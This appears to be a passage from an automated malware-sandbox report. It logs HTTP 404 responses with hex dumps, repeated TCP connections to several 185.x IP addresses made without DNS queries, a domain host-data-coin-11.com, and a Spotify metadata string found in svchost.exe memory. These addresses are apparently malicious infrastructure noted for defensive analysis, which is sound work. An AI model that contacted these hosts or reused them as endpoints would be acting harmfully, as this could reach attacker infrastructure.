199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:06:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 48 e5 af 8d 70 bc 57 dd 40 d6 f6 2e 84 2a e8 c3 90 53 2e ef a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9HpW@.*S.c0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:06:03 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:06:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 49 eb ab 85 70 bc 57 dd 40 d7 fe 26 83 22 eb c3 93 58 28 e3 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9IpW@&"X(c0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:06:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:06:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 37 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 99 d6 08 56 3d 41 be f5 dc fc fb 49 f5 53 d2 30 f9 53 47 91 0d 0a 30 0d 0a 0d 0a Data Ascii: 27I:82OV=AIS0SG0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:06:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:06:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:06:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:06:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 33 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 00 53 87 1d f0 f3 66 e6 23 59 1b f2 fc c4 4a 0d 0a 30 0d 0a 0d 0a Data Ascii: 33I:82OTevSf#YJ0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:06:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Found	Server: nginx/1.20.1	Date: Fri, 14 Jan 2022 20:06:15 GMT	Content-Type: text/html; charset=utf-8	Transfer-Encoding: chunked	Connection: close	Data Raw: 33 32 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 4f 0a ad 24 c4 d0 66 b1 78 06 50 b9 e1 d9 0d 0a 30 0d 0a 0d 0a	Data Ascii: 32I:82OTevO$fxP0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Found	Server: nginx/1.20.1	Date: Fri, 14 Jan 2022 20:06:16 GMT	Content-Type: text/html; charset=utf-8	Transfer-Encoding: chunked	Connection: close	Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a	Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Found	Server: nginx/1.20.1	Date: Fri, 14 Jan 2022 20:06:17 GMT	Content-Type: text/html; charset=utf-8	Transfer-Encoding: chunked	Connection: close	Data Raw: 33 33 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 42 06 8e 51 de c4 66 e6 23 59 1b f2 fc c4 4a 0d 0a 30 0d 0a 0d 0a	Data Ascii: 33I:82OTevBQf#YJ0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Found	Server: nginx/1.20.1	Date: Fri, 14 Jan 2022 20:06:18 GMT	Content-Type: text/html; charset=utf-8	Transfer-Encoding: chunked	Connection: close	Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a	Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Found	Server: nginx/1.20.1	Date: Fri, 14 Jan 2022 20:06:18 GMT	Content-Type: text/html; charset=utf-8	Transfer-Encoding: chunked	Connection: close	Data Raw: 33 31 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 7c 0f a5 54 f2 ba 66 f4 39 1b 1b a4 fc 0d 0a 30 0d 0a 0d 0a	Data Ascii: 31I:82OTev|Tf90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.186.142.166
Source: unknown	TCP traffic detected without corresponding DNS query: 185.186.142.166
Source: unknown	TCP traffic detected without corresponding DNS query: 185.186.142.166
Source: unknown	TCP traffic detected without corresponding DNS query: 185.233.81.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.233.81.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.233.81.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.233.81.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.233.81.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.233.81.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.233.81.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.233.81.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: svchost.exe, 0000002F.00000003.411494738.00000137971EE000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","N equals www.facebook.com (Facebook)
